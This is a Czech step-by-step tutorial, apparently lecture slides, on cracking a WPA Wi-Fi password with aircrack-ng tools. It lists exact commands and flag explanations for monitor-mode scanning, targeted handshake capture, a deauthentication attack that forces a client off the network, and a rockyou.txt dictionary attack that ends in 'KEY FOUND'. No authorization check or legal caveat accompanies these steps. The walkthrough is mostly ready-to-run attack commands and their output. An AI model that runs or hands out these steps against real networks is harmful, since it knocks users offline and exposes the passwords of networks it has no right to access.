Návod: Hacking Wi-Fi

Detailní vysvětlení příkazů a parametrů

Předpoklad: Vaše Wi-Fi karta je již v Monitor módu (rozhraní wlan0mon).

Na každém slajdu najdete přesný příkaz i popis toho, co jednotlivé přepínače znamenají a co do nich doplnit.

1. Krok - Kontrola síťové karty

Spusťte příkaz pro ověření stavu bezdrátové karty:

iwconfig
Parametr Co znamená Co zde uvidím / co zadat
iwconfig Příkaz pro výpis bezdrátových rozhraní Nemá žádné přepínače. Hledám název rozhraní (např. wlan0mon) a stav Mode:Monitor.
2. Krok - Skenování sítí v okolí

Spusťte celkové skenování všech rozsahů ve vzduchu:

sudo airodump-ng wlan0mon
Parametr Co znamená Co do něj patří
sudo Spuštění s právy správce (root) Vyžadováno pro nízkoúrovňový přístup k síťové kartě.
airodump-ng Nástroj pro skenování a odchytávání Zobrazuje sítě v dosahu a jejich klienty.
wlan0mon Název vaší Wi-Fi karty v monitor módu Zadejte přesný název z 1. kroku (např. wlan0mon nebo wlan0).

→ Z tabulky si opište BSSID (MAC routeru) a CH (číslo kanálu) vaší sítě.

3. Krok - Zacílení na síť a ukládání paketů

Příklad příkazu pro zacílení na vybranou síť:

sudo airodump-ng -c 6 --bssid AA:BB:CC:11:22:33 -w pokus wlan0mon
Přepínač Co znamená Co tam přesně napsat
-c 6 Channel (Číslo kanálu sítě) Zadejte číslo kanálu vaší sítě z Kroku 2 (např. -c 6 nebo -c 11).
--bssid AA:BB:... MAC adresa routeru (AP) Vložte přesnou MAC adresu z Kroku 2 ze sloupce BSSID.
-w pokus Write (Název výstupního souboru) Zvolte název souboru. Vytvoří se např. pokus-01.cap s odchyceným provozem.

DŮLEŽITÉ: Toto okno nechte běhat! V dolní části si zapište MAC adresu klienta ze sloupce STATION.

4. Krok - Vynucení přihlášení (Deautentizace)

V DRUHÉM okně terminálu pošlete deautentizační útok:

sudo aireplay-ng --deauth 5 -a AA:BB:CC:11:22:33 -c 99:88:77:66:55:44 wlan0mon
Přepínač Co znamená Co tam přesně napsat
--deauth 5 Počet odpojovacích paketů Kolik paketů poslat (hodnota 5 až 10 stačí k odpojení).
-a AA:BB:CC:... Access Point (BSSID routeru) MAC adresa vysílače z Kroku 2. Útočíme pod jeho jménem.
-c 99:88:77:... Client (Station MAC klienta) MAC adresa odpojovaného klienta z dolní tabulky Kroku 3 ze sloupce STATION.
5. Krok - Kontrola zachycení Handshaku

Přepněte se do PRVNÍHO okna s airodump-ng a sledujte pravý horní roh:

Hledám zelené potvrzení:

[ WPA handshake: AA:BB:CC:11:22:33 ]
Co to znamená? Co musím udělat?
Odchytili jsme 4 pakety přihlašovacího 4-Way Handshaku a jsou bezpečně zapsány v souboru pokus-01.cap. Stiskněte v 1. okně zkratku Ctrl + C pro ukončení skenování. Každé další skenování by vytvořilo nový soubor pokus-02.cap.
6. Krok - Prolomení hesla ze slovníku

Spusťte slovníkový útok v nástroji Aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt pokus-01.cap
Přepínač / Soubor Co znamená Co tam přesně napsat
-w /usr/.../rockyou.txt Wordlist (Slovník hesel) Cesta ke slovníku hesel v Kali Linuxu. Výchozí je /usr/share/wordlists/rockyou.txt.
pokus-01.cap Vstupní soubor s handshakem Soubor vytvořený v Kroku 3. Pozor na příponu -01.cap, kterou airodump-ng přidává automaticky!

Výsledek: KEY FOUND! [ odhaleneheslo ]